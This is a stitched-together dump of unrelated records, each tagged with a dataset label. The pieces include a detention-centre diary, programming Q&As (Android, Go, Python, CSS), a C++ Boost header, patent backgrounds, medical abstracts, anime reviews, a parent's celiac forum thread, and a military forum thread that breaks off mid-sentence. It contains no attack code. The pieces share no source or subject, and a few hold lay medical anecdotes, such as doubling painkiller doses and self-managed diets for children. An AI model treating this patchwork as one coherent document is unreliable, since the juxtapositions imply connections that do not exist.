Pages Thursday, 20 September 2012 (Day 62) Hwaseong Immigration Detention Center-day 49 sit-ups push-ups chairlifts 0 0 0 Breakfast 2 hard boiled eggs Lunch some soup tofu in red pepper paste Dinner N/A I'm writing this retroactively since I missed a day because I was put in solitary confinement due to yesterday's incident-- not as a direct result, but as a continuation. The irony is not lost on me, since I claimed they couldn't do exactly what they did. At lunch time, when medications are handed out, I usually get some painkillers for lower back pain-- sitting on the floor and sleeping on a hard mattress doe NOT make your back feel better. Anyway, the dude giving out the meds was the same dude from yesterday. When I asked where my meds were, he dismissed we with a wave of his hand. I got upset at being treated so rudely, so I was rude back. After another shouting match, a different guard came and said I could see a doctor after lunch. After lunch came, I went to see the doctor. When I came back to the cell, 7 guards were standing there to escort me to solitary confinement. I did not go quietly. Once again, I found myself in a room that was equal in length and width to my height, so there was enough room to lie down. There was a toilet, a tap, and a window looking out into the exercise yard. No mattress, no blankets, no toothbrush, spoon or toilet paper. Soon thereafter, it was the exercise period so I was able to talk to my fellow detainees through the window. The American called my contact at the Canadian embassy. After the exercise period, I was moved to a different solitary cell. This one had my mattress, blankets, cup, spoon and toothbrush, as well as a bottle of water, toilet paper, a bar soap and a new tube of toothpaste. The asshole guard was now the proud owner of a video camera and videotaped my move from one cell to the next. A little while later my meds were unceremoniously tossed through the bars. I didn't take them. Later dinner was delivered. I didn't eat it. More meds came. This time, I took both doses so I would pass out and sleep through the night. Honestly, I can deal with being a small room, but I can't deal with being in a small room with nothing to do, so better to double up on the pain medication and pass out then stare at the ceiling. The American tells me he tried to call the Human Rights Center but the phone kept getting disconnected or turned off.
{ "pile_set_name": "Pile-CC" }
The CRAPL: An academic-strength open source license - budu http://matt.might.net/articles/crapl/ ====== noelwelsh This is fantastic. The author is absolutely correct: academic software is crap. I've used software written by someone who wrote a well known tutorial on Haskell, and his code was a pile of junk. This is the right way to do it in academia -- you are only rewarded for publishing so good academics write the minimal system necessary for publication and then dump the code. As a side note, Matt Might's backups suck if he could only find that one program ;) As another side note, the PLT group behind Racket are exceptional for publishing lots and writing good code.
{ "pile_set_name": "HackerNews" }
Q: i am trying to download excel file when i click on anchor in html "Download" <a href="/App_Data/Files/Example.xlsx"download>Download</a> I am using this code but this is not helpful Click to Download Sample EmpMaster File Format A: Checking your path it means you are trying to directly access the file inside App_Data folder App_Data files cannot be accessed directly via URL for security reasons, you need a server side code to transfer to different folder, or flush it on the response stream See same solution here
{ "pile_set_name": "StackExchange" }
1. Field of the Invention The invention relates to a flash memory, in particular to a method for handling data updating of a flash memory and related memory cards. 2. Description of the Related Art A flash memory is a non-volatile memory that can be electrically erased and reprogrammed. Flash memories are primarily used in memory cards and USB flash drives for general storage and transfer of data between computers and other digital products. Flash memory costs far less than EEPROM and therefore has become a dominant memory device. Examples of products applying flash memory include Personal Digital Assistants (PDA) and laptop computers, digital audio players, digital cameras and mobile phones. A flash memory comprises a large number of blocks, and each block comprises a plurality of pages for storing data. A flash memory is erased by a unit of a block and programmed by a unit of a page, when data of the flash memory is erased, all pages of a block of the memory must be erased together. When data is written to a flash memory, the data, however, can be written to a specific page of a block of the flash memory. In addition, data can only be written to a page where no data is stored or a page which has been erased. However, each block of the flash memory could only be erased certain times. When the erased times of a block exceed a threshold value, the block can not be written correctly and mistakes may occur while the data is read from the block, it is very important to use the block averagely to service lifetime of the flash memory, however, the conventional erasing and writing ways can not effectively achieve the goal. Therefore, a more efficient and average way of utilizing the block of the flash memory is required.
{ "pile_set_name": "USPTO Backgrounds" }
Tag: Recommended Chirpy, eternally hopeful young Yukie works as a caseworker for elder care company Green Net. Unfortunately, thanks to the meddling of a jealous colleague, the senior citizens she’s dispatched to care for are the toughest cases: difficult, dangerous, and frequently supernatural. Yukie’s assignments include a …Read more » In 1997, the late Satoshi Kon released what many would refer to as his magnum opus. It was called Perfect Blue, and it was written by Sadayuki Murai. Based on the novel Perfect Blue: Complete Metamorphosis from Yoshikazu Takeuchi, it was billed as a psychological …Read more » Ran Uruma, a fourth-grader, lives with her teenage brother Jin and their father in their cluttered house. Ran dreams of following in her mother’s footsteps, which is no small dream, because Ran’s mother Shizuka is a powerful sorceress … so powerful that when she visits …Read more » Junk Dog is a bum with little room for positive forward trajectory in his life. Part of that has to do with his general way of living, but the rest falls firmly in the lap of his coach, Gansaku Nanbu. You see, Junk Dog is …Read more » It seems impossible we’ll ever again witness an anime like 1985’s Robot Carnival. The last great anthology film, Short Peace, went almost entirely ignored. The last great anthology series, Space Dandy, was at best misunderstood, at worst excoriated. Not for its quality, mind: as Jacob …Read more » Born into a poor family in 1941, Tadao Tsuge grew up in the chaos and poverty of immediate postwar Japan: a rundown Tokyo of open sewers and ruined buildings, populated by thugs, prostitutes, and occupying American GIs. In the late 1960s and 1970s, these memories …Read more » Originally revealed as an April Fools’ joke in 2017, Just Because! eventually came to fruition as an original anime TV series by studio PINE JAM (Gamers!, Mahou Shoujo Nante Mouiide-sukara), director Atsushi Kobayashi, and The Pet Girl of Sakurasou creator Hajime Kamoshida. The results are …Read more » Noshiro is used to changing schools and being the odd man out, so when he sees his new classmate Sanada being shunned by their class, he steps in to end Sanada’s loneliness. But things are more complicated than Noshiro realizes, and befriending Sanada sets him …Read more » As an amateur but talented photographer, high school student and orphan Tada Mitsuyoshi lives to capture presented moments, but how will body guard-protected, foreign transfer student Teresa Wagner encourage or change his raison d’être? If you’re a fellow anime cynic, the very term “transfer student” …Read more » Sixteen-year-old Nakamura Okuto has just fallen in love for the first time. Not only is he head over heels in love with his classmate Hirose Aiki, but he’s absolutely clueless on how to act on those feelings. As he observes his blissfully unaware classmate every …Read more » Based on Nisioisin’s light novel and with a tip of the hat to Graphinica’s anime adaptation, Juni Taisen: Zodiac War is now a manga as well. Akira Akatsuki, the artist best suited for the job, once again collaborates with the prolific author five years after …Read more » In the 1990s and 2000s, an American manga reader might get the impression Japan was more progressive on LGBT issues than the US: American mainstream comics were aggressively straight, while manga was filled with genderqueer characters, sex-swapping, and gay romance. But in 2018, Japanese politics …Read more » We’re only partway through 2018, but Hinamatsuri is already one of the year’s best anime comedies. It’s hardly the kind of show that usually attracts attention from fans, but the six episodes that have aired as I write this combine an inventive premise with precise …Read more » The aptly named Crisis City is protected from all manner of evil by The Undertaker: Grave Digger Kaede! This intimidating moniker belongs to an adorable little girl with a ton of power. Kaede is one of several children, dubbed the Crisis Girls, born with cursed …Read more » One of the best things to happen to Devilman, Go Nagai’s horror manga masterpiece, is the inception of its expanded universe. The additions to the saga include complete reimaginings like Devilman G and Devilman Lady and expansions to the original story like AMON: Apocalypse of …Read more »
{ "pile_set_name": "Pile-CC" }
[Determination of amphetamine derivatives in urine with solid phase micro-extraction (SPME)]. Amphetamine derivatives (amphetamine A, methamphetamine MA, 3,4-methylene-dioxy-methamphetamine MDMA, 3,4-methylene-dioxy-amphetamine MDA and 3,4-methylene-dioxy-N-ethyl-amphetamine MDE) are the first most frequently group of abused illegal drugs in Hungary. This experimental work deals with in the determination of amphetamines in connection with the forensic toxicological applicability of a relatively new isolation process, the SPME using by GC-NPD analysis. The paper demonstrates 14 types of amphetamine investigation from spiked urine samples and reports two typical amphetamine cases for SPME isolation method.
{ "pile_set_name": "PubMed Abstracts" }
Q: can't create folder in /mnt/sdcard I think I'm doing everything right to first create a folder that I can write to later in my app, but it doesn't seem to be working. Any clues as to how I've failed? It correctly tries to create /mnt/sdcard/gradebook I have uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" in my manifest. I'm running on a real device (Samsung Galaxy S) and I'm not using the sdcard as storage while its attached to my computer. boolean mExternalStorageAvailable = false; boolean mExternalStorageWriteable = false; String state = Environment.getExternalStorageState(); if (Environment.MEDIA_MOUNTED.equals(state)) { // We can read and write the media mExternalStorageAvailable = mExternalStorageWriteable = true; } else if (Environment.MEDIA_MOUNTED_READ_ONLY.equals(state)) { // We can only read the media mExternalStorageAvailable = true; mExternalStorageWriteable = false; Toast.makeText(this,"This Application needs a writable external storage (sdcard).",Toast.LENGTH_SHORT).show(); finish(); } else { // Something else is wrong. It may be one of many other states, but all we need // to know is we can neither read nor write mExternalStorageAvailable = mExternalStorageWriteable = false; Toast.makeText(this,"This Application needs a mounted external storage (sdcard).",Toast.LENGTH_SHORT).show(); finish(); } File folder = new File(Environment.getExternalStorageDirectory () + "/gradeBook"); boolean success = false; if(!folder.exists()){ success = folder.mkdir(); } if (!success) { Log.e("FILE", "can't create " + folder); } else { Log.i("FILE", "directory is created"); } Here is the manifest <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.ulsanonline.gradebook" android:versionName="@string/version" android:installLocation="auto" android:versionCode="2"> <uses-sdk android:minSdkVersion="8"></uses-sdk> <application android:icon="@drawable/icon" android:debuggable="true" android:persistent="false" android:hasCode="true" android:minSdkVersion="8"> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.CAMERA" /> <activity android:name=".CourseWork" android:label="@string/app_name" android:screenOrientation="portrait"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> A: uses-permission must be placed directly as <manifest> child, so it should be: <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.ulsanonline.gradebook" android:versionName="@string/version" android:installLocation="auto" android:versionCode="2"> <uses-sdk android:minSdkVersion="8"></uses-sdk> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.CAMERA" /> <application android:icon="@drawable/icon" android:debuggable="true" android:persistent="false"
{ "pile_set_name": "StackExchange" }
var searchData= [ ['getdebuglog',['getDebugLog',['../classts3admin.html#a1f5f0bfffa7e348c26c7087a9af2f0d6',1,'ts3admin']]], ['getelement',['getElement',['../classts3admin.html#ac9de91d0184cda14b8cf535a71e4bc56',1,'ts3admin']]], ['geticonbyid',['getIconByID',['../classts3admin.html#a4256bad98633722439c4d791ba90d4d7',1,'ts3admin']]], ['getqueryclid',['getQueryClid',['../classts3admin.html#a186ce4e7c332002db8dc7fbd3f693635',1,'ts3admin']]], ['gm',['gm',['../classts3admin.html#a30dc8dd5f20f1d2331641875da7a774e',1,'ts3admin']]] ];
{ "pile_set_name": "Github" }
Q: Why I get 0 and 1 in the following golang code example with defer Call to defer produces different results for variables declared in two different ways package main import ( "fmt" ) func c(i int) int { defer func() { i++ }() return i } func c1() (i int) { defer func() { i++ }() return i } func c2() (i int) { defer func() { i++ }() return 2 } func main() { fmt.Println(c(0)) // Prints 0 fmt.Println(c1()) // Prints 1 fmt.Println(c2()) // Prints 3 Thank you icza } https://play.golang.org/p/gfnnCZ--DkH A: In the first example i is an (incoming) parameter. At the return statement the return value is evaluated, and the deferred function runs after this, and incrementing i in that has no effect on the return value. In the second example i is the name of the result parameter. At the return statement you explicitly return the value i, which is then assigned to the return value i (this is a no-op). But deferred functions are allowed to modify the values of the return "variables", and if they do so, that will have an effect on the actual returned values. This becomes clearer if we add another example: func c2() (i int) { defer func() { i++ }() return 2 } This function will return 3, because the return 2 statement will assign 2 to i, then the deferred function will increment this, and so the return value will be 3. Try this one on the Go Playground. Relevant part from the Spec: Return statements: A "return" statement that specifies results sets the result parameters before any deferred functions are executed. In general, if a function (or method) has named result parameters, the return values will always be the values of those variables, but must not forget that a return statement may assign new values to these result paramteters, and they may be modified by deferred functions after a return statement. This is mentioned in the Spec: Defer statements: For instance, if the deferred function is a function literal and the surrounding function has named result parameters that are in scope within the literal, the deferred function may access and modify the result parameters before they are returned. It is also mentioned in the blog post Defer, Panic and Recover: Deferred functions may read and assign to the returning function's named return values. And also in Effective Go: Recover: If doParse panics, the recovery block will set the return value to nil—deferred functions can modify named return values. See related question: How to return a value in a Go function that panics?
{ "pile_set_name": "StackExchange" }
Q: font awesome not working inside a tag I have this simple code. The font awesome is not working on it. <a data-bind="click: someAction, attr: {id: 'sample-'+ $index(), href: 'sample-'+ $index()}, text: name" class="list-group-item" data-toggle="collapse"> <span style="float: right"><i class="fa fa-plus"></i></span></a> I have the correct version of font-awesome installed. If I write the span tag outside of a tag, I can see the plus sign but I want the text and icon to be on the same line. A: I had no option but to change the code: <a data-bind="click: someAction, attr: {id: 'sample-'+ $index(), href: 'sample-'+ $index()}, text: name" class="list-group-item" data-toggle="collapse"> <span style="float: right"></span></a><i class="fa fa-plus"></i>
{ "pile_set_name": "StackExchange" }
// // Copyright 2005-2007 Adobe Systems Incorporated // // Distributed under the Boost Software License, Version 1.0 // See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt // #ifndef BOOST_GIL_EXTENSION_DYNAMIC_IMAGE_ANY_IMAGE_VIEW_HPP #define BOOST_GIL_EXTENSION_DYNAMIC_IMAGE_ANY_IMAGE_VIEW_HPP #include <boost/gil/dynamic_step.hpp> #include <boost/gil/image.hpp> #include <boost/gil/image_view.hpp> #include <boost/gil/point.hpp> #include <boost/variant.hpp> namespace boost { namespace gil { namespace detail { template <typename View> struct get_const_t { using type = typename View::const_t; }; template <typename Views> struct views_get_const_t : public mpl::transform<Views, get_const_t<mpl::_1> > {}; } template <typename View> struct dynamic_xy_step_transposed_type; namespace detail { // works for both image_view and image struct any_type_get_num_channels { using result_type = int; template <typename T> result_type operator()(const T&) const { return num_channels<T>::value; } }; // works for both image_view and image struct any_type_get_dimensions { using result_type = point<std::ptrdiff_t>; template <typename T> result_type operator()(const T& v) const { return v.dimensions(); } }; } //////////////////////////////////////////////////////////////////////////////////////// /// CLASS any_image_view /// /// \ingroup ImageViewModel /// \brief Represents a run-time specified image view. Models HasDynamicXStepTypeConcept, HasDynamicYStepTypeConcept, Note that this class does NOT model ImageViewConcept /// /// Represents a view whose type (color space, layout, planar/interleaved organization, etc) can be specified at run time. /// It is the runtime equivalent of \p image_view. /// Some of the requirements of ImageViewConcept, such as the \p value_type alias cannot be fulfilled, since the language does not allow runtime type specification. /// Other requirements, such as access to the pixels, would be inefficient to provide. Thus \p any_image_view does not fully model ImageViewConcept. /// However, many algorithms provide overloads taking runtime specified views and thus in many cases \p any_image_view can be used in places taking a view. /// /// To perform an algorithm on any_image_view, put the algorithm in a function object and invoke it by calling \p apply_operation(runtime_view, algorithm_fn); //////////////////////////////////////////////////////////////////////////////////////// template <typename ImageViewTypes> class any_image_view : public make_variant_over<ImageViewTypes>::type { using parent_t = typename make_variant_over<ImageViewTypes>::type; public: using const_t = any_image_view<typename detail::views_get_const_t<ImageViewTypes>::type>; using x_coord_t = std::ptrdiff_t; using y_coord_t = std::ptrdiff_t; using point_t = point<std::ptrdiff_t>; any_image_view() : parent_t() {} template <typename T> explicit any_image_view(const T& obj) : parent_t(obj) {} any_image_view(const any_image_view& v) : parent_t((const parent_t&)v) {} template <typename Types> any_image_view(const any_image_view<Types>& v) : parent_t((const typename make_variant_over<Types>::type&)v) {} template <typename T> any_image_view& operator=(const T& obj) { parent_t::operator=(obj); return *this; } any_image_view& operator=(const any_image_view& v) { parent_t::operator=((const parent_t&)v); return *this;} template <typename Types> any_image_view& operator=(const any_image_view<Types>& v) { parent_t::operator=((const typename make_variant_over<Types>::type&)v); return *this;} std::size_t num_channels() const { return apply_operation(*this, detail::any_type_get_num_channels()); } point_t dimensions() const { return apply_operation(*this, detail::any_type_get_dimensions()); } x_coord_t width() const { return dimensions().x; } y_coord_t height() const { return dimensions().y; } }; ///////////////////////////// // HasDynamicXStepTypeConcept ///////////////////////////// template <typename IVTypes> struct dynamic_x_step_type<any_image_view<IVTypes>> { using type = any_image_view<typename mpl::transform<IVTypes, dynamic_x_step_type<mpl::_1>>::type>; }; ///////////////////////////// // HasDynamicYStepTypeConcept ///////////////////////////// template <typename IVTypes> struct dynamic_y_step_type<any_image_view<IVTypes>> { using type = any_image_view<typename mpl::transform<IVTypes, dynamic_y_step_type<mpl::_1>>::type>; }; template <typename IVTypes> struct dynamic_xy_step_type<any_image_view<IVTypes>> { using type = any_image_view<typename mpl::transform<IVTypes, dynamic_xy_step_type<mpl::_1>>::type>; }; template <typename IVTypes> struct dynamic_xy_step_transposed_type<any_image_view<IVTypes>> { using type = any_image_view<typename mpl::transform<IVTypes, dynamic_xy_step_transposed_type<mpl::_1>>::type>; }; }} // namespace boost::gil #endif
{ "pile_set_name": "Github" }
The present invention relates to subterranean cementing operations, and more particularly, to improved casing strings, and methods of using such improved casing strings in subterranean cementing operations. Hydraulic cement compositions commonly are utilized in subterranean operations, particularly subterranean well completion and remedial operations. For example, hydraulic cement compositions are used in primary cementing operations whereby pipe strings, such as casings and liners, are cemented in well bores. In typical primary cementing operations, hydraulic cement compositions are pumped into the annular space between the walls of a well bore and the exterior surface of the pipe string disposed therein. The cement composition is permitted to set in the annular space, thereby forming an annular sheath of hardened substantially impermeable cement therein that substantially supports and positions the pipe string in the well bore and bonds the exterior surface of the pipe string to the walls of the well bore. Conventionally, two common pumping methods have been used to place the cement composition in the annulus. First, the cement composition may be pumped down the inner diameter of the pipe string, out through a casing shoe and/or circulation valve at the bottom of the pipe string and up through the annulus to its desired location. This is referred to as a conventional-circulation direction method. Second, the cement composition may be pumped directly down the annulus so as to displace well fluids present in the annulus by pushing it through the casing shoe and up into the inner diameter of the pipe string. This is referred to as a reverse-circulation direction method. In reverse-circulation methods, it is generally undesirable for the cement composition to enter the inner diameter of the pipe string from the annulus through the casing shoe and/or circulation valve. This often is the case, because any resultant set cement typically must be drilled out before further operations are conducted in the well bore. The drill out procedure may be avoided by preventing the cement composition from entering the inner diameter of the pipe string through the casing shoe and/or circulation valve.
{ "pile_set_name": "USPTO Backgrounds" }
Clinical and post mortem analysis of combat neck injury used to inform a novel coverage of armour tool. There is a requirement in the Ministry of Defence for an objective method of comparing the area of coverage of different body armour designs for future applications. Existing comparisons derived from surface wound mapping are limited in that they can only demonstrate the skin entry wound location. The Coverage of Armour Tool (COAT) is a novel three-dimensional model capable of comparing the coverage provided by body armour designs, but limited information exists as to which anatomical structures require inclusion. The aim of this study was to assess the utility of COAT, in the assessment of neck protection, using clinically relevant injury data. Hospital notes and post mortem records of all UK soldiers injured by an explosive fragment to the neck between 01 Jan 2006 and 31 December 2012 from Iraq and Afghanistan were analysed to determine which anatomical structures were responsible for death or functional disability at one year post injury. Using COAT a comparison of three ballistic neck collar designs was undertaken with reference to the percentage of these anatomical structures left exposed. 13/81 (16%) survivors demonstrated complications at one year, most commonly upper limb weakness from brachial plexus injury or a weak voice from laryngeal trauma. In 14/94 (15%) soldiers the neck wound was believed to have been the sole cause of death, primarily from carotid artery damage, spinal cord transection or rupture of the larynx. COAT objectively demonstrated that despite the larger OSPREY collar having almost double the surface area than the two-piece prototype collar, the percentage area of vulnerable cervical structures left exposed only reduced from 16.3% to 14.4%. COAT demonstrated its ability to objectively quantify the potential effectiveness of different body armour designs in providing coverage of vulnerable anatomical structures from different shot line orientations. To improve its utility, it is recommended that COAT be further developed to enable weapon and tissue specific information to be modelled, and that clinically significant injuries to other body regions are also incorporated.
{ "pile_set_name": "PubMed Abstracts" }
Anaplastic large cell lymphoma involving the breast: a clinicopathologic study of 6 cases and review of the literature. Lymphomas involving the breast are rare, and most cases are of B-cell lineage; T-cell neoplasms represent less than 10% of all breast lymphomas. To define the clinicopathologic spectrum of anaplastic large cell lymphomas (ALCLs) involving the breast. Six cases of ALCL involving the breast were identified at a single institution during 21 years. The clinicopathologic and immunophenotypic features are presented, and the literature is reviewed. All patients were women, with a median age of 52 years. There were 4 anaplastic lymphoma kinase- negative (ALK(-)) ALCL cases; 3 of these neoplasms developed around breast implants. Two patients with ALK(-) ALCL had a history of cutaneous ALCL. There were 2 ALK(+) ALCLs; both patients had stage IV disease. Histologically, all neoplasms were composed of large anaplastic cells that were uniformly CD30(+) and expressed markers of T-cell lineage. Four patients with adequate follow-up are alive, with a mean of 4.1 years (range, 1.5-9 years) after diagnosis of the breast tumor. Included in this group are 2 patients with ALK(-) ALCL associated with breast implants who were alive 4 years and 9 years after diagnosis. Including the 6 cases we describe, a total of 21 cases of ALCL involving the breast are reported. Fifteen cases, all ALK(-), were associated with breast implants, suggesting a possible pathogenetic relationship, and associated with an excellent prognosis. Patients with cutaneous ALCL can subsequently develop ALK(-) ALCL involving the breast, and these tumors can be associated with breast implants.
{ "pile_set_name": "PubMed Abstracts" }
Hi everyone - I've been distant for awhile because life's just been busy, but I wanted to pop back again to report that all 3 of my boys are growing again!!! To recap briefly, my 3 year old had "weak positive" bloodwork for celiac, iron deficient anemia, and failure to thrive, while my 5 year old had neg. celiac bloodwork, but had elevated liver enzymes and was also failure to thrive. And then my 1 year old back in July had started in the 75th percentile at 3 months and by a year had fallen off the bottom of the growth chart, had SEVERE reflux, and very weird stool while on gluten. As of June 4th, due to the 3 year olds bloodwork, all the other symptoms put together, knowing that I am DQ 2.5 positive, and just having that mommy instinct, I took them all off of gluten completely. I've been tracking their weight on a weekly basis since June 4th and I'm so happy to say that they are all back on the growth charts. The baby and the oldest are in the 25th - 30th percentiles now and the 3 1/2 year old is just above the 12th. My youngest has gained 6 pounds since June and the other two have put on just above 3 pounds. Not to mention no more tummy aches, normal stool for all of them, energy abounds, and their cheeks are not flaming red anymore. I am so excited to see them happy and healthy again. Thanks to all for the encouragement and wisdom that is shared here. It's a big help to those of us on the journey to figuring all of this out! Yeah - I did talk to the counselors. I totally understand that the child had no idea how the food would affect my son; the bullying aspect of it is what bothered me more than anything. I''m sure things will be fine now and he is having a great time overall :-). I was just surprised that kids that young really care about what each other is eating/not eating. I realize it could have been over anything - it just happened to be around what I call his "kryptonite!" I'm sure this won't be the first time things like this happen, so I guess it's good practice! Soooo, my son is at a Day Camp this week. Things have been going very well. I've packed his lunch and extra snacks for when they do that sort of thing and he knows to only eat what I've packed. However, yesterday there was another 5 year old who apparently couldn't understand why DS couldn't eat the graham cracker snacks that had been provided. He and another kid were waving it around DS and telling him to just take a bite, so DS said, "Please stop doing that." One of the boys stopped, while the other one crammed the graham cracker against DS's mouth!! Who does that!?! DS said, "Mom I just went like this (and pursed his lips together really hard)." I told him he did a really great job handling the situation and protecting his body, but several hours after picking him up from camp he proceeded to have several rounds of diarrhea. I'm not crazy to believe it was from the graham cracker crumbs on his lips, correct? I really just don't understand why it bothers other people so much when we choose not to eat or really just can't eat certain foods -- even at 5 years old! Craziness!!!! One thought is to have them all do the genetic testing. It wouldn't give them an official diagnosis, but it might help you know which kids to watch more closely and to have blood screens done on every couple years or so. My doctor and I think that I have celiac disease (couldn't be officially tested because I was already wheat free from a wheat allergy, but carry DQ 2.5 and have all the symptoms plus resolution once gluten-free) and one of my children has positive bloodwork. We're planning on doing genetics with the other 3 at some point down the road just so we can get a better idea of who to watch more closely. I did mine through Prometheus and thought they did a great job. Although, I think with having a 1st degree relative with a positive diagnosis, they're supposed to get screened every few years anyway. Good luck and welcome aboard! Man I'm hoping we get to see some of this growth too!! All 3 of my boys are in about the 5th percentiles, but I just took my 1 year old in for his well child and at 4 mths he was 75th for weight, at 8 mths he dropped to the 10th, and now at 1 year he dropped again to the 5th He's been gluten free since the 8 month appt., so I was hoping for a little more growth than what we saw. His height curve dropped to WELL BELOW the bottom of the chart. He's sensitive/allergic to milk, so any ideas for high fat/high calorie foods that I could give him. I'm already trying egg yolks and avocados. I want to figure this out before he wastes away in front of me Thanks everyone! If I had to guess, I'd say you have DQ 2.2 because I also did the Prometheus testing and mine came back as "DQ2 heterozygous," which put me in a "high" risk category. At the bottom of my report where it lists what alleles were detected it stated: DQ2.5 (HLA DQA1*05:DQB1*0201) and other non-risk alleles. I'm assuming the only thing that separates the "DQ2 Heterozygous" and the "DQ2/other low risk gene" categories are the subtypes. Please correct me if I'm wrong though!! Just in case anyone else is wondering I talked to someone at Sandoz, the makers of the Levothyroxin 112 mcg that I'm taking and they said that while they can't certify that their products are gluten free because they don't test for it in their facilities, none of the actual ingredients in the medication contain gluten. Do you think it's safe to assume that the medication is okay then??? Thanks everyone for the responses and esp. for that website. I had tried contacting the company, but hadn't got very far, and then ended up just getting busy with other things and forgetting all about it. I will pursue that further for sure. I haven't had another migraine since Sunday and am praying things stay that way!!! Has anyone experienced migraines after going gluten-free? I've never had a migraine before in my life but was just hit with a terrible one last night complete with auras and everything. As far as I know I've been gluten free but maybe some sneaked in somewhere. The only thing I can think of is possibly my thyroid meds that I take everyday (Levothyroxine by Sandoz). I've tried looking into them, but haven't been able to get an answer yet. Does anyone else know about that company or experienced something similar? Just wondering if you ever found out anything more? My 3 year old was just diagnosed with "weak positive" bloodwork and slight anemia among many other symptoms. My other son is 5 and we put him on a gluten-free diet since he also shows symptoms although his celiac panel was in range. His liver enzymes were elevated though and I know that I am DQ2.5 positive, sooooo I'm going to be proactive and hope we just catch it early. Oh wow, Nora, thank you so much for pointing that out. From what I'm reading online, it looks like the deamidated IgG test has a 98.6% specificity rate. I guess that puts an end to my wondering if it was truly positive bloodwork for celiac! I was originally thinking that that number was sensitive to gluten, but not specific for celiac, but I hadn't realized it was a diff. test than the old one for IgG. Thanks for clearing that up for me!!!!!!!! It's looking to me like we've caught it early on, which I'm so thankful for. My doctor actually is convinced that he has celiac. I just wasn't sure if technically speaking we could come to that conclusion by most medical standards w/o pos. bloodwork and/or a biopsy. I also believe that he has celiac, but there's part of me that wants to know for sure whether it's a gluten sensitivity or an AI disorder. I know it doesn't really make a difference as far as his diet is concerned; I guess I'm just curious. We do suspect that he carries one of the genes for celiac because I recently tested positive for DQ 2.5 At some point we would like to do the genetic testing for him as well. Thanks for the point on the anemia. I thought that was the case that that type of anemia is strongly assoc. with celiac disease, which is another confirmation that we're on the right track. My son was diagnosed as celiac today. He definitely manifests many if not all of the classic symptoms for children, so we are going to go gluten free as we have already seen improvement, but I have a question regarding his bloodwork because as I understand it, without IgA being positive and/or a pos. scope, he can't officially be diagnosed as celiac, correct? At 1 and a half yrs of age were: IGG 19.9 (20.0-30.0 weak positive) IGA 2.3 (<20.0 negative) TTG IgA .2 (ref. range 0.0 - 10.0) (No total IgA was drawn, so I don't know if he's deficient or not) At 3 yrs. old they are: IGG 16.0 (<20.0 negative) IGA 7.2 (<20.0 negative) TTG IgA 2.4 (ref. range <4.0) My questions are: 1) Is it normal for someone's TTG IgA to be increasing over time? 2) Can we get a total serum IgA count while being gluten free? Also, his complete blood count revealed slight microcytosis (iron deficient anemia as I understand it) and a slightly elevated neutrophil level. Thanks for your help!! My son is exactly the same. At his 2 year check up his labwork was inconclusive (like a point or two away from pos.) and now at his 3 year checkup they were normal, but he is also 3 1/2 yrs old and weighs about 27 pounds. He has tummy aches all the time, explosive BMs, and flaming red cheeks. I have issues with gluten too and just found out that I am DQ2.5 positive, so it gives us a little clue. We meet with our doctor on Thursday to see if we should just do a gluten free trial or have him get biopsied. There are a lot of false negatives for bloodwork in kids, so yes, your daughter still could have it. We accidentaly went gluten free for a day with him and then the next day he had gluten and it took him out completely. Even though our appt. isn't until next week, we're going gluten free until then to see what reaction we get. However if we do decide to get a biopsy he'd have to be on gluten. Good luck on your journey and keep us posted! Follow Us Like us on Facebook About Us Celiac.com was founded in 1995 by Scott Adams, author of Cereal Killers, founder and publisher of Journal of Gluten Sensitivity, and founder of The Gluten-Free Mall, who had a single goal for the site: To help as many people as possible with celiac disease get diagnosed and living a happy, healthy gluten-free life!
{ "pile_set_name": "Pile-CC" }
Q: how to demonstrate python GIL (how do I know there is only one thread executing at a time) Is there any way to demonstrate 'only one thread can is executing code at a time'? A strange observation is that I see multiple cores running in htop, as if there are multiple threads rea executing simultaneously, what is that? (The reason why I want to do this, is that I'm using pybind to binding my cpp code to python, and I'm dealing with some GIL release policy, so I want see how many threads are executing) A: Try running some hard problem that uses lots of CPU, such as calculating the 15800000th term of the Fibonacci sequence. Takes around 2 seconds on a single thread using IDLE. Try doing it on two now. import threading import timeit def tesr(): a, b = 1, 0 for _ in range(15800000): a, b = a + b, b # Current thread print("Current thread time:") print(timeit.timeit( stmt='tesr()', setup='from __main__ import tesr', number=1, )) print() # Single thread print("Single thread time:") print("(Should take about the same time as current)") t = threading.Thread(target=tesr) print(timeit.timeit( stmt='t.start(); t.join()', setup='from __main__ import t', number=1, )) print() # Two threads t1, t2 = (threading.Thread(target=tesr) for _ in range(2)) print("Two threads time:") print("(Should take about double the current / single time)") print(timeit.timeit( stmt='t1.start(); t2.start(); t1.join(); t2.join()', setup='from __main__ import t1, t2', number=1, )) My output: Current thread time: 2.0613602900000387 Single thread time: (Should take about the same time as current) 2.228870080999968 Two threads time: (Should take about double the current / single time) 4.671865998000044
{ "pile_set_name": "StackExchange" }
ARRSE have partnered with Armadillo Merino to bring you an ARRSE exclusive, generous discount offer on their full price range. To keep you warm with the best of Merino gear, visit www.armadillomerino.co.uk and use the code: NEWARRSE40 at the checkout to get 40% off! This superb deal has been generously offered to us by Armadillo Merino and is valid until midnight on the the 28th of February. Signing Documents Electronically LE Can anyone please advise how to store & use a signature electronically in order to sign documents? There must be an easier way than printing, manually signing & scanning the completed doc back into the computer. Simple lingo please, I'm nearly as bad as 'arry Redknapp when it comes to technical jargon LE You can do this on Adobe Acrobat, but it ain't cheap and unless you have a tablet and pen, trying to draw your signature ends up looking like you were having some sort of epilepsy issues whilst drawing it. Well, mine did anyway. If you have a drawing "image" (jpeg) of your signature you can import that into just about any sort of document. You do need to make sure that it is then "locked" so no further editing can take place, as the image of your signature could easily be lifted off the doc you attached it to! I've been having the same problem myself with signing and scanning docs, and it seems the biggest problem is that of security and legality. All depends on the docs you are signing I guess, but if it's for something that needs to be legally compliant, your own handwritten signature in ink is required (so I am told!). But then, where I work everything has to be signed by at least four people in authority, in triplicate and in Unicorn Blood, including permission slips to go for a wee. LE Depends if you just want a facsimile of your sig to put at the end of a letter, similar to the guff I get from banks, water boards, etc. Or do you want to be 